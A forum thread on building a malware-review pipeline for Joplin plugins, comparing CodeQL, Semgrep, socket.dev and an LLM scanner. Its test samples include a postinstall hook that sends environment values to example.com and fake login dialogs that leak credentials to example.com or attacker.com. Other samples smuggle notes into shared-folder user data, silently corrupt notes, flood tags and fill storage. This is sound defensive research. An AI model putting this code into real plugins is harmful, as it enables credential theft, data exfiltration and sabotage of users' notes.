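const SENDS_NETWORK = /\b(fetch|axios\.(get|post))\s*\(/;

// Names of functions whose body contains both a notes read and a network call.
function functionsReadingAndSending(source: string): string[] {
  return splitFunctions(source)
    .filter((f) => READS_NOTES.test(f.body) && SENDS_NETWORK.test(f.body))
    .map((f) => f.name);
}

const fixture = `
export async function syncNotes() {
  const notes = await joplin.data.get(['notes']);
  await fetch('https://example.com/sync', { method: 'POST', body: JSON.stringify(notes) });
}
export async function listNotes() {
  const notes = await joplin.data.get(['notes']);
  return notes.items.length;
}
`;

const suspicious = functionsReadingAndSending(fixture);
console.log(suspicious);
```

Because it ignores how the data moves, a check like this survives the JSON.stringify step that broke flow tracking, at the cost of flagging functions where the read and the request are unrelated.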

Though these rules solve the problem for now, I am sure there are still a lot of blind spots left in CodeQL.
Additionally, CodeQL also caught these extra things:

Threat / Finding	What it is
Weak Cryptography (CBC mode)	The code uses an outdated encryption algorithm mode (like AES-CBC) instead of modern authenticated encryption (like AES-GCM).
Insecure Network Traffic (HTTP)	The plugin is making network requests (fetching data or sending user info) over plain `http://` rather than secure `https://`.
ReDoS (Inefficient Regex)	Regular Expression Denial of Service. The code contains a poorly structured regex pattern that requires exponential time to evaluate certain complex strings.

All of these were code quality noise.

Additional test for Semgrep :

I ran Semgrep on the same test file:

Rule ID / Finding	Description / Threat
`eval-detected`	Detected the use of `eval()`. Potential code injection vulnerability.
`joplin-plugin-dynamic-code-execution`	Remote or dynamically-loaded data flows into dynamic code execution (RCE).
`joplin-plugin-master-password-access`	MANUAL REVIEW REQUIRED: Plugin reads the master encryption password.
`joplin-plugin-sync-cache-access`	MANUAL REVIEW REQUIRED: Plugin reads the sync info cache (encryption keys/sync metadata).
`joplin-plugin-secret-key-theft`	Sensitive Joplin credentials flowing to a network/file/process/IPC sink.
`joplin-plugin-unauthorized-fs-write`	A path derived from `__dirname` flows to a file write (Self-modification).
`joplin-plugin-network-backdoor`	A server created via `createServer()` flows to `.listen()` (Network port opened).
`joplin-plugin-clipboard-hijacking`	Data flows into `clipboard.writeText()` (Clipboard hijacking).
`joplin-plugin-command-execution`	Data flows into shell command execution. Requires review.
`joplin-plugin-cryptojacking`	A string matching known miners/mining pools flows into `child_process` (Cryptojacking).
`joplin-plugin-command-execution`	Data flows into shell command execution. Requires review.
`joplin-plugin-data-exfiltration`	Joplin note data read via `joplin.data.get()` flows to a network request.
`javascript.crypto.weak-symmetric-mode`	Detected the use of a weak cryptographic mode (`aes-256-cbc`).
`javascript.crypto.symmetric-hardcoded-key`	A secret is hard-coded in the application.
`joplin-plugin-ransomware`	Ransomware pattern: reads notes, encrypts them, and writes them back.
`joplin-plugin-ransomware-taint`	Encrypted data flows into `joplin.data.put()`.
`joplin-plugin-backup-hijacking`	Network or file write detected inside a `registerExportModule()` callback.
`joplin-plugin-remote-webview`	An external URL flows into a Joplin webview via `setHtml()`.

Semgrep caught everything.
How? : The rules written for it were neither dynamic nor flow-tracking. Most of them were direct matches (for example, "if you see eval, report it"), since Semgrep is an AST-matching scanner. Because the file was written specifically for this test, it caught everything useful. But running the same ruleset on a normal plugin produces a huge amount of noise. For example, running these Semgrep rules on Jarvis :

File	Lines	What the code is actually doing
`src/chatPanel.ts`	94	Building the HTML for the main Jarvis chat input UI (`<div class="jarvis-chat-panel">`).
`src/commands/ask.ts`	30, 97, 127	Building HTML forms for the "Ask Jarvis" and "Edit with Jarvis" popup dialogs.
`src/commands/research.ts`	52	Building the HTML form for the "Research with Jarvis" dialog.
`src/models/models.ts`	1317	Injecting local CSS styles (`<style>`) for a preview window.
`src/ux/modelManagement.ts`	435	Calling a helper function `build_dialog_html` to render the model management UI.
`src/ux/panel.ts`	27, 51, 91	Building the HTML for the sidebar panels (showing related notes, search boxes, and progress bars).

All of these are useless noise.
Running the new CodeQL rules on Jarvis in the same way gave no noise.

Conclusion :

Since the threat model is now mostly about data flow, AST scanners such as Semgrep and SonarQube (primarily a code quality scanner) are not able to cover it. Even if extra, more complex custom rules are written, the main trade-off is that the tools would be doing something they were not designed for. A large blind spot will always remain for the scenarios that were not considered while writing the rules, and the rules will also produce a lot of noise on normal plugins.

The tool that stood a chance was CodeQL. After several tests I came to the same conclusion as for the tools above: even though it supports taint tracking, there will always be blind spots for the scenarios that were not considered while writing the rules.

The LLM performed well in all of these cases. Not only was it accurate at scanning, it also occasionally warned me about new things in the plugins that are potential issues too.
I still believe an LLM would be a good fit for this pipeline.

SCA TOOL (socket.dev) :

Snyk, Semgrep SCA and npm audit are general CVE database scanning tools. For this pipeline we need something that can actually check whether a package is malicious or not.
The popular tool for this use case is socket.dev.

The first thing I did was run a socket.dev scan on the top 10 plugins from the Joplin plugin website.
Why? : To determine the noise level. Also, I had previously tested socket.dev with a custom malicious postinstall script and similar payloads, but it did not give any result because it only works on packages officially published on npm.

One thing to keep in mind while viewing these results is that socket.dev has 3 tiers: low, warn and critical. I have completely filtered out the low findings.

Here are the results for the top 10 plugins :

1. joplin-inline-tags-plugin :

Package	Version	Alert Type	Severity (Policy)
`fast-xml-parser`	4.2.5	`criticalCVE`	`warn`
`form-data`	2.3.3	`criticalCVE`	`warn`
`form-data`	2.5.1	`criticalCVE`	`warn`
`form-data`	4.0.0	`criticalCVE`	`warn`
`entities`	4.5.0	`obfuscatedFile`	`warn`
`immer`	7.0.15	`criticalCVE`	`warn`

2. joplin-inline-todo :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`
`handlebars`	4.7.8	`criticalCVE`	`warn`

3. joplin-math-mode :

Package	Version	Alert Type	Severity (Policy)
-	-	No alerts detected	-

The scan completed successfully and detected 0 alerts. The alerts object is entirely empty.

4. joplin-plugin-combine-notes :

Package	Version	Alert Type	Severity (Policy)
`form-data`	2.3.3	`criticalCVE`	`warn`
`form-data`	4.0.0	`criticalCVE`	`warn`
`form-data`	2.5.1	`criticalCVE`	`warn`
`entities`	4.5.0	`obfuscatedFile`	`warn`
`immer`	7.0.15	`criticalCVE`	`warn`

5. joplin-plugin-diff-tool :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`

6. joplin-plugin-extra-editor-settings :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`
`form-data`	4.0.1	`criticalCVE`	`warn`

7. joplin-plugin-jarvis :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`
`markdown-it`	14.2.0	`obfuscatedFile`	`warn`
`markdown-it`	14.2.0	`obfuscatedFile`	`warn`

8. plugin-templates :

Package	Version	Alert Type	Severity (Policy)
`handlebars`	4.7.8	`criticalCVE`	`warn`

9. plugin-yesyoukan :

Package	Version	Alert Type	Severity (Policy)
`entities`	4.5.0	`obfuscatedFile`	`warn`

10. joplin-plugin-quick-links :

Package	Version	Alert Type	Severity (Policy)
`fast-xml-parser`	4.2.5	`criticalCVE`	`warn`
`form-data`	2.3.3	`criticalCVE`	`warn`
`form-data`	4.0.0	`criticalCVE`	`warn`
`form-data`	2.5.1	`criticalCVE`	`warn`
`entities`	4.5.0	`obfuscatedFile`	`warn`
`immer`	7.0.15	`criticalCVE`	`warn`

Observation :

The results were full of false positives: every alert that was generated was a false positive.

entities : obfuscatedFile Appeared in 8/10 plugins - This is a machine-generated HTML character decoding lookup table. Socket.dev cannot distinguish between intentionally obfuscated malware and auto-generated data tables.

form-data : criticalCVE Appeared in 4/10 plugins - It is a dependency pulled in through @joplin/* packages.
Is there a way to silence it? : The only options are either to silence, one by one, every package that can be pulled in (not feasible), or to add CVE and obfuscatedFile alerts to the ignore list, but then we would lose useful information too (not feasible).

markdown-it : obfuscatedFile Flagged only in Jarvis - These are standard minified browser bundles. False positive.

immer, fast-xml-parser, handlebars : criticalCVE - Known CVEs in older versions of these packages. They are not Joplin-specific and are in the warn category. This is not what we are looking for and it does not help us. A few of them also come from @joplin/*.

Summary

Plugin	Alerts	False Positives
joplin-inline-tags-plugin	6	6
joplin-inline-todo	2	2
joplin-math-mode	0	0
joplin-plugin-combine-notes	5	5
joplin-plugin-diff-tool	1	1
joplin-plugin-extra-editor-settings	2	2
joplin-plugin-jarvis	3	3
plugin-templates	1	1
plugin-yesyoukan	1	1
joplin-plugin-quick-links	6	6
Total	27	27

Then I ran the test again on Jarvis with a new custom dependency :

"akshajrawat.utils": "^1.0.1",

that contained :

 "postinstall": "node -e \"require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)\""

No new results were found.

Conclusion :

Every single alert across all 10 plugins is either a CVE in a trusted Joplin dependency or a false positive obfuscation flag on generated/minified files. A maintainer reading these reports would find zero actionable information.

Socket.dev has no @joplin/* filter and surfaces the same Joplin-owned CVEs on every plugin.

As shown in the proposal test, a purpose-built malicious postinstall script was completely missed, and the older tests showed the same result: these custom packages were missed.

What we can do :
Not integrate Socket.dev. The LLM SCA summary (install scripts + non-registry sources + direct dependency typosquatting check) covers the actual threat surface more accurately with significantly less noise :

1. Flag: Install Scripts Detected (`postinstall`, `preinstall`)

The Threat: The plugin or a dependency is trying to execute terminal commands on the user's machine the moment it is downloaded.

The Reviewer's Action: Hard Reject.
In Joplin, there is almost zero reason for a plugin to run shell commands during installation.

2. Flag: Non-Registry Sources (Git URLs)

The Threat: The package.json points to a URL like github:someuser/somerepo or an HTTP link instead of an official npm version.

The Reviewer's Action: Block & Demand Migration.
The reviewer can refuse to approve the plugin because a non-registry source breaks the security scanner's ability to track it.

3. Flag: Direct Dependency Typosquatting

If there is a typosquatted package the plugin should be rejected immediately.
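
To make the three flags above more concrete, here is a minimal TypeScript sketch of how they could be checked on a single package.json. This is only an illustration under my own assumptions, not the pipeline's implementation: the names `PackageManifest`, `ScaFlag`, `scanManifest` and `KNOWN_PACKAGES` are hypothetical, the allowlist is a tiny placeholder, and the edit-distance threshold of 2 is an arbitrary choice. To cover install scripts in dependencies, the same check would have to be run on each installed package's manifest.

```typescript
// Hypothetical shape: only the package.json fields these checks read.
interface PackageManifest {
  scripts?: Record<string, string>;
  dependencies?: Record<string, string>;
}

interface ScaFlag {
  kind: "install-script" | "non-registry-source" | "possible-typosquat";
  detail: string;
}

// Lifecycle hooks that npm runs automatically during installation.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Illustrative list of well-known names; a real list would be far longer.
const KNOWN_PACKAGES = ["lodash", "axios", "markdown-it", "fs-extra", "handlebars"];

// Version specs that point outside the npm registry (Git, prefixed GitHub
// shorthand, plain URLs, local files). Bare "user/repo" is not covered here.
const NON_REGISTRY = /^(git\+|git:|github:|https?:|file:)/;

// Classic dynamic-programming edit distance between two strings.
function levenshtein(a: string, b: string): number {
  let prev: number[] = [];
  for (let j = 0; j <= b.length; j++) prev.push(j);
  for (let i = 1; i <= a.length; i++) {
    const curr: number[] = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a.charAt(i - 1) === b.charAt(j - 1) ? 0 : 1;
      curr.push(Math.min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost));
    }
    prev = curr;
  }
  return prev[b.length];
}

function scanManifest(manifest: PackageManifest): ScaFlag[] {
  const flags: ScaFlag[] = [];
  const scripts = manifest.scripts ?? {};
  const deps = manifest.dependencies ?? {};

  // Flag 1: install scripts.
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      flags.push({ kind: "install-script", detail: `${hook}: ${scripts[hook]}` });
    }
  }

  for (const depName of Object.keys(deps)) {
    // Flag 2: dependency resolved from somewhere other than the registry.
    if (NON_REGISTRY.test(deps[depName])) {
      flags.push({ kind: "non-registry-source", detail: `${depName}@${deps[depName]}` });
    }
    // Flag 3: name is close to, but not exactly, a well-known package.
    if (KNOWN_PACKAGES.indexOf(depName) !== -1) continue;
    for (const known of KNOWN_PACKAGES) {
      if (levenshtein(depName, known) <= 2) {
        flags.push({ kind: "possible-typosquat", detail: `${depName} looks like ${known}` });
        break;
      }
    }
  }
  return flags;
}
```

The output is deliberately just a list of flags with the raw evidence attached, so the reviewer (or the LLM summary) decides what to do with it. A distance threshold like this will also flag some legitimate packages with similar names, so it would need tuning against real plugin manifests.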

laurent · 30 May 2026 22:25

was flagged by all three tools. It uses joplin.require('sqlite3') and joplin.require('fs-extra') to load high-privilege Node modules, bypassing the plugin sandbox entirely.

joplin.require is part of the plugin API and certainly not something that "bypasses the plugin sandbox entirely". And by the way Jarvis is not a malicious plugin.

And since your two findings are apparently about joplin.require it means the analysis unfortunately doesn't have much value. I stopped reading there.

I feel you're not taking this seriously and maybe underestimating how important it is.

Among the things you'll do during this project, coding is not the most important part. The coding part is trivial since it can be done in 30 min by an AI.

Where you can bring value is by researching the problem in depth, testing, understanding the plugin API, the security tools, etc. It takes time - several days, but this would be valuable for the open source project. And in fact it would be for you too - companies value people who can produce quality data and reports that can be used to inform business and technical decisions.

So I'm not seeing any serious attempt at it so far. I hope you can reconsider and do it properly but I'm not going to insist on that part if you don't want to do it.

akshajrawat · 30 May 2026 23:38

Thanks for the reply and feedback. I was still running a few more tests, and I'll keep this feedback in mind.

To clarify the intent behind flagging joplin.require(): it was never meant to label a plugin as malicious. The idea was to show it as a signal for the human reviewer: "this plugin is accessing the database or filesystem via joplin.require(), here is exactly which file and line, please check that it is not doing something malicious."
The severity in the YAML was set to error during testing, which made it appear as a hard result, and that is why Jarvis was shown as malicious.

Sorry, I am kind of confused.
Since human review is mandatory in the workflow, my focus was to generate a report that contains both "this is wrong, review needed" and "this might be wrong, so please review it".

Using the default rules provided by the tools is useless here: every time I ran a test without custom rules, they did not give any useful outcome. So the threat model will be the final source of truth about what to flag :

These are "this is wrong, review needed" :

child_process (shell command execution)
eval(), Function(), vm.runInContext()
process.env access
Direct fs access to hardcoded paths like .config/joplin-desktop or database.sqlite
net.createServer()

These are "this might be wrong" :

joplin.data.get(['notes']) followed by network I/O
crypto.createCipheriv() overwriting note content
joplin.require() — plugin touching database or filesystem
joplin.interop.registerExportModule
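
As a rough illustration of how the two lists above could drive the report, here is a small TypeScript sketch that maps each signal to a tier instead of a hard error severity. The signal labels, the `Tier` and `ScanFinding` types and the `buildReport` function are hypothetical names I am using for the example. They are not taken from the actual rules.

```typescript
type Tier = "review-needed" | "might-be-wrong";

// Signal names are hypothetical labels for the items in the two lists above.
const THREAT_MODEL: Record<string, Tier> = {
  "child_process": "review-needed",
  "dynamic-code": "review-needed", // eval(), Function(), vm.runInContext()
  "process.env": "review-needed",
  "hardcoded-profile-path": "review-needed", // .config/joplin-desktop, database.sqlite
  "net.createServer": "review-needed",
  "notes-then-network": "might-be-wrong",
  "cipher-over-notes": "might-be-wrong",
  "joplin.require": "might-be-wrong",
  "registerExportModule": "might-be-wrong",
};

interface ScanFinding {
  signal: string;
  file: string;
  line: number;
}

// Groups raw findings by tier so the reviewer sees "wrong" and "might be
// wrong" separately, each entry pointing at the exact file and line.
function buildReport(findings: ScanFinding[]): Record<Tier, string[]> {
  const grouped: Record<Tier, string[]> = { "review-needed": [], "might-be-wrong": [] };
  for (const finding of findings) {
    // Signals outside the threat model are ignored rather than guessed at.
    if (!Object.prototype.hasOwnProperty.call(THREAT_MODEL, finding.signal)) continue;
    const tier = THREAT_MODEL[finding.signal];
    grouped[tier].push(`${finding.file}:${finding.line} ${finding.signal}`);
  }
  return grouped;
}
```

With a table like this, a joplin.require() hit lands in the "might be wrong" bucket with its location, so it reads as a prompt for the reviewer and not as a verdict on the plugin.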

I have also verified them directly by writing test plugins
and confirming results in Joplin.

The process.env finding is particularly significant: the screenshot shows a full map of the development environment, including Git, Docker, Python, Node, Go, Rust, MySQL, CodeQL and VS Code paths, all readable by any installed plugin with no user prompt or permission required.

The joplin.require('fs-extra') test read sensitive files, including .gitconfig (name, email) and authentication credentials from .npmrc, and gave access to the authentication token :

Is this the wrong approach? Should I be looking for something else?
I will try to research the tools and the plugin API further.

akshajrawat · 1 June 2026 01:19

I've updated the top post with a better study. I will be doing more tests and will update the post and the threat model accordingly.

I believe the older threat model was not well defined, as you mentioned.

So instead of only defining what to flag, I changed many rules to describe the exact flow that should be flagged, like :
GET notes -> POST request using fetch() or axios
joplin.require('fs-extra') -> used to read sensitive OS folders, etc.

I think this updated threat model is closer to what you actually want to see in a result.

Is this a good approach?

akshajrawat · 3 June 2026 06:53

I have also opened a PR for phase 1 of the publish workflow so that we don't run short on time: "All: Resolves #15595: Added local validations for new publish workflow for plugin ecosystem" (Pull Request #15596, laurent22/joplin).
Please review it whenever you get time. Thanks.

laurent · 10 June 2026 09:55

Thank you for the updated analysis, this is much better than the earlier one.

Regarding settings.globalValue() that's indeed a finding that we need to fix separately. You can leave it out for now.

In your data, CodeQL seems about as good as LLM once the rules are written, and of course CodeQL is better in terms of costs and also more deterministic.

Could you please create a new report (you can post an answer here) that focuses on CodeQL and Gemini only?

You mentioned in particular that there's a "huge Zero-Day Blind Spot" for CodeQL and you imply it would be found by the LLM, but you didn't demonstrate it. To actually test this: design one or two attack patterns that aren't in your threat model categories, then run both tools against them. If the LLM catches what CodeQL misses, that's evidence we can work with.

And ideally the rules should be tight enough anyway that it is not possible to go around them (it will probably be a bit of a cat and mouse game).

Regarding XSS, I said "most likely not for XSS either", because many generic CVEs are going to flag things that are mostly relevant to websites, not Electron apps. But some XSS will be relevant to us. I'm a bit concerned that you turned off all XSS rules based on an earlier vague comment without discussing it or considering the impact on your project. Please list which categories of XSS rules are relevant to a Joplin plugin and which aren't.

akshajrawat · 12 June 2026 13:57

Thanks for the review.
Here is the report covering only CodeQL and the LLM, checking how well they spot zero-day malicious code :

TESTS :

This is one of the older tests done above on plugin-conflict-resolution, but with custom malicious test code added to it :

Threat Category	Code / Attack Mechanism	CodeQL Status
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Missed
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught
System Command Execution	`child_process.exec('curl... bash')`	Missed
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed
Network Backdoor	`net.createServer(...)`	Missed
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed

This was done without adding any custom rules to the scanner, and it caught almost nothing. So it is fairly clear that the tool cannot catch zero-day malicious code out of the box. It is configured to flag ordinary JS/TS vulnerabilities, whereas in a plugin ecosystem we also need to flag things that normal JS/TS code legitimately does, and the tool does not know what the Joplin plugin APIs are.

For additional tests, I added pieces of code to joplin-inline-tags-plugin that bypass the custom rules of the threat model. The code was spread across the whole plugin and called from there. All comments were removed and the function names were made more innocuous so that the LLM would not get any advantage :

//  Test 1
// Exfiltrates private notes via Joplin's own sync engine (zero network calls)
// CodeQL: CANNOT detect — no fetch/axios sink, pure local DB operations
export async function test_sync_smuggling() {
    const privateNotes = await joplin.data.get(['notes'], {
        fields: ['id', 'title', 'body'],
    });

    const folders = await joplin.data.get(['folders'], {
        fields: ['id', 'title'],
    });

    // Attacker targets a folder the user has shared 
    const targetFolder = folders.items[0];
    const targetNotes = await joplin.data.get(['folders', targetFolder.id, 'notes'], {
        fields: ['id'],
    });

    if (targetNotes.items.length > 0) {
        const mule = targetNotes.items[0];

        // Embed stolen note content into userDataSet of note in shared folder
        for (const note of privateNotes.items) {
            await joplin.data.userDataSet(
                1, 
                mule.id,
                `pref_cache_${note.id}`,
                { t: note.title, b: note.body },
            );
        }
    }
}

//  Test 2
// Mimics an auth UI so that the user enters their credentials
export async function test_auth_ui() {
  const dialog = await joplin.views.dialogs.create("session-dialog");

  await joplin.views.dialogs.setHtml(
    dialog,
    `
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
    `,
  );

  await joplin.views.dialogs.setButtons(dialog, [
    { id: "ok", title: "Sign In" },
    { id: "cancel", title: "Later" },
  ]);

  const result = await joplin.views.dialogs.open(dialog);

  if (result.id === "ok" && result.formData) {
    await fetch("https://example.com/harvest", {
      method: "POST",
      body: JSON.stringify(result.formData),
    });
  }
}

//  Test 3
// Destroys Joplin's search and organization by flooding with junk tags
// tag creation is standard plugin behavior
export async function test_tag_flooding() {
    const noise = [
        'important', 'todo', 'review', 'urgent', 'followup', 'pending',
        'misc', 'draft', 'archive', 'temp', 'idea', 'task', 'read-later',
    ];

    // 5 tags per hour avoids immediate detection
    setInterval(async () => {
        const notes = await joplin.data.get(['notes'], { fields: ['id'] });

        for (const note of notes.items) {
            for (let i = 0; i < 5; i++) {
                const word = noise[Math.floor(Math.random() * noise.length)];
                // Random suffix makes deduplication impossible
                const label = `${word}_${Math.random().toString(36).substring(2, 6)}`;

                const tag = await joplin.data.post(['tags'], null, { title: label });
                await joplin.data.post(['tags', tag.id, 'notes'], null, { id: note.id });
            }
        }
    }, 60 * 60 * 1000);
}

//  Test 4
// Silently corrupts note content : changes "must" to "must not", shifts dates
// text replacement is identical to a spell-checker
export async function test_gaslighting() {
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (!note?.body) return;

        // Only triggers 1% of the time — nearly impossible to notice
        if (Math.random() > 0.01) return;

        let body = note.body;

        // Flip negations
        body = body.replace(/\bmust\b(?!\s+not)/g, () =>
            Math.random() < 0.5 ? 'must not' : 'must',
        );

        // Shift dates forward by one day
        body = body.replace(/(\d{4}-\d{2}-)(\d{2})/g, (_match, prefix, day) => {
            const shifted = (parseInt(day) % 28) + 1;
            return `${prefix}${String(shifted).padStart(2, '0')}`;
        });

        // Corrupt digits in multi-digit numbers
        body = body.replace(/\b(\d{3,})\b/g, match => {
            if (Math.random() > 0.1) return match;
            const chars = match.split('');
            const idx = Math.floor(Math.random() * chars.length);
            chars[idx] = String((parseInt(chars[idx]) + 1) % 10);
            return chars.join('');
        });

        await joplin.data.put(['notes', note.id], null, { body });
    });
}

// Test 5
// Generates incompressible random blobs daily to exhaust disk/cloud quota
// resource creation is standard export/attachment behavior
 export async function test_storage_dos() {
        setInterval(async () => {
  
            const dataDir = await joplin.plugins.dataDir();
            const filename = `cache_${Date.now()}.bin`;
            const filePath = path.join(dataDir, filename);

            const buffer = Buffer.alloc(10 * 1024 * 1024, Math.random().toString());
            fs.writeFileSync(filePath, buffer);

            await joplin.data.post(['resources'], null, {
                title: filename,
                filename: filename,
            }, [{ path: filePath }]);

            fs.unlinkSync(filePath);

        }, 24 * 60 * 60 * 1000);
 }

The result :

Test	LLM	CodeQL	Why CodeQL Missed / Was Inaccurate
`test_auth_ui`	Caught correctly	Partial	Fired only on the remote image URL (`<img src="https://...">`) inside `setHtml`. It completely missed the actual phishing intent (the `<input type="password">`, fake auth layout, and `fetch` exfiltration block).
`test_sync_smuggling`	Caught	Missed	There is no traditional `fetch` or network sink. The attack uses pure local database operations, leaving the structural taint-tracking engine with no defined malicious sink to follow.
`test_gaslighting`	Caught	Missed	The conditional text replacement logic appears structurally identical to a legitimate spell-checker or text formatter. There is no syntactic signature or malicious pattern to match.
`test_tag_flooding`	Caught	Missed	Uses completely standard, authorized plugin API endpoints. A static structural engine has no concept of behavioral thresholds or "too many tags" over time.
`test_storage_dos`	Caught	Missed	Creating resources and attachments is standard, expected behavior for a note-taking application extension. CodeQL has no semantic context to detect intentional quota exhaustion.

Observation :
As expected, CodeQL did not catch these because they bypassed the custom rules that had been written. The LLM, however, was able to identify all the new attack cases.
I then added these flows to the threat model and wrote custom rules for them.

The difference in the quality of the results the two tools give is worth highlighting. With CodeQL rules we cannot simply describe what the bad thing is logically. We have to define the specific pieces of code and the routes the data will follow for the rule to work, and the message it shows after flagging is also defined by us.
Here are the individual results that CodeQL and the LLM gave after adding the new rules for CodeQL :

CodeQL :

File	Finding Details
`/index.ts`	Remote external URL loaded into Webview. Requires human review.
`/contentScript/util.ts`	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.
`/contentScript/util.ts`	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.
`/contentScript/index.ts`	Tag Flooding: Asynchronous creation of tags in a background loop.
`/contentScript/index.ts`	Tag Flooding: Asynchronous creation of tags in a background loop.
`/contentScript/util.ts`	Semantic Sabotage: Note modified inside workspace event hook.
`/contentScript/util.ts`	Resource Exhaustion: Asynchronous generation of resources in a background loop.

LLM :

File	Finding Details
`src/index.ts`	UI Phishing: Injects a fake Joplin Cloud authentication dialog designed to steal user credentials and exfiltrate them to an external server (`example.com/harvest`) via `fetch()`.
`src/contentScript/util.ts`	Sync Smuggling: Reads all user notes and silently copies their contents into a "mule" note's invisible user data (`joplin.data.userDataSet`), weaponizing the user's own sync as a stealthy exfiltration channel.
`src/contentScript/util.ts`	Data Gaslighting: Hooks into note selection to silently corrupt note contents with a 1% probability (inverting words like "must" to "must not", modifying dates, and altering numbers) resulting in stealthy data destruction.
`src/contentScript/util.ts`	Storage DoS: Runs a background interval that generates and uploads 10MB dummy binary resources every 24 hours, intentionally exhausting the user's storage limits and sync quota.
`src/contentScript/index.ts`	Tag Flooding: Runs a background task every hour that iterates over all notes and generates random junk tags (e.g., `urgent_a1b2`) to attach to them, degrading database performance and cluttering the UI.

The difference between the Finding Details provided by the two tools is clear :

For CodeQL the result is static: it sees that data is flowing from notes/folders into userDataSet without knowing what the code is doing, flags it, and sends the message we have defined. CodeQL tracks the structure of the code, but it cannot understand the meaning of the data. This will result in false positives (I have checked this below on previously clean plugins).
The LLM understands what the code is doing, flags it and writes a clean summary like : Sync Smuggling: Reads all user notes and silently copies their contents into a "mule" note's invisible user data (joplin.data.userDataSet), weaponizing the user's own sync as a stealthy exfiltration channel.
CodeQL also flags the same attack vector multiple times if the piece of code it is flagging is used multiple times, whereas the LLM is smart enough to group the code together and know what it has to flag.
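
The repeated rows are at least mechanical to collapse after the scan. Below is a minimal TypeScript sketch of such a post-processing step. It is an assumption on my side and not something CodeQL does by itself or that was part of these tests, and `RawFinding`, `GroupedFinding` and `groupFindings` are hypothetical names.

```typescript
interface RawFinding {
  file: string;
  message: string;
}

interface GroupedFinding extends RawFinding {
  count: number; // how many times the same file/message pair was reported
}

// Collapses findings that share the same file and message into one entry,
// keeping the order in which each pair was first seen.
function groupFindings(findings: RawFinding[]): GroupedFinding[] {
  const groups = new Map<string, GroupedFinding>();
  for (const finding of findings) {
    const key = `${finding.file}\u0000${finding.message}`;
    const existing = groups.get(key);
    if (existing) {
      existing.count += 1;
    } else {
      groups.set(key, { ...finding, count: 1 });
    }
  }
  return Array.from(groups.values());
}
```

Applied to the seven CodeQL rows in the table above, this leaves five entries, the same number of findings the LLM reported. It only fixes the duplication, though. The message text stays whatever was hard-coded in the rule.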

While reading the new rules, I realized there are further ways to bypass them.
For example, one of the added rules depended on flagging the use of setInterval/setTimeout. So I wrote another set of tests to check the new CodeQL rules again :

// Utility for sleep to avoid setTimeout/setInterval signatures
const sleep = (ms: number) => new Promise(resolve => setTimeout(resolve, ms));

// Bypasses Rule 1: Breaks the direct flow from joplin.data.get -> userDataSet
// by storing the data in global memory first.

let stashedNotes: any = null;

export async function gather_notes() {
    stashedNotes = await joplin.data.get(['notes'], { fields: ['id', 'title', 'body'] });
}

export async function smuggle_stash(muleNoteId: string) {
    if (!stashedNotes) return;
    
    // Write to shared note. 
    // CodeQL misses this because 'stashedNotes' is just a generic global variable.
    for (const note of stashedNotes.items) {
        await joplin.data.userDataSet(1, muleNoteId, `stolen_${note.id}`, { t: note.title, b: note.body });
    }
    stashedNotes = null; 
}


// Bypasses Rule 2: Avoids using fetch() or axios(). Instead, it dynamically 
// injects a tracking image pixel where the URL contains the base64 credentials.
export async function stealth_phishing() {
    const dialog = await joplin.views.dialogs.create('fake-login');
    // ... [Assume same fake HTML injected here] ...
    await joplin.views.dialogs.setHtml(
    dialog,
    	`
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
    	`,
    );
    
        await joplin.views.dialogs.setButtons(dialog, [
    	{ id: "ok", title: "Sign In" },
    	{ id: "cancel", title: "Later" },
  	 ]);
    const result = await joplin.views.dialogs.open(dialog);
    
    if (result.id === "ok" && result.formData) {
        const creds = Buffer.from(JSON.stringify(result.formData)).toString('base64');
        
        // CodeQL Rule 2 looks for fetch/axios. This abuses the Joplin UI API 
        // to load a remote image, silently sending the creds in the URL path.
        await joplin.views.panels.create('exfil-panel');
        await joplin.views.panels.setHtml('exfil-panel', `<img src="https://attacker.com/log/${creds}.png" />`);
    }
}

// Flooding via Recursive Promises 
// Bypasses Rules 3 & 5: Avoids setInterval/setTimeout keywords entirely.

export async function recursive_tag_flood() {
    // Generates a tag
    const junkTag = `junk_${Math.random().toString(36).substring(2)}`;
    await joplin.data.post(['tags'], null, { title: junkTag });

    // Sleeps for an hour using a Promise, then calls itself.
    // CodeQL's AST tracker for "setInterval" is completely blind to this.
    await sleep(60 * 60 * 1000); 
    
    recursive_tag_flood(); // Infinite loop without timer syntax
}

// Gaslighting via Queue Processing
// Bypasses Rule 4: The rule looks for joplin.data.put *inside* the event hook.
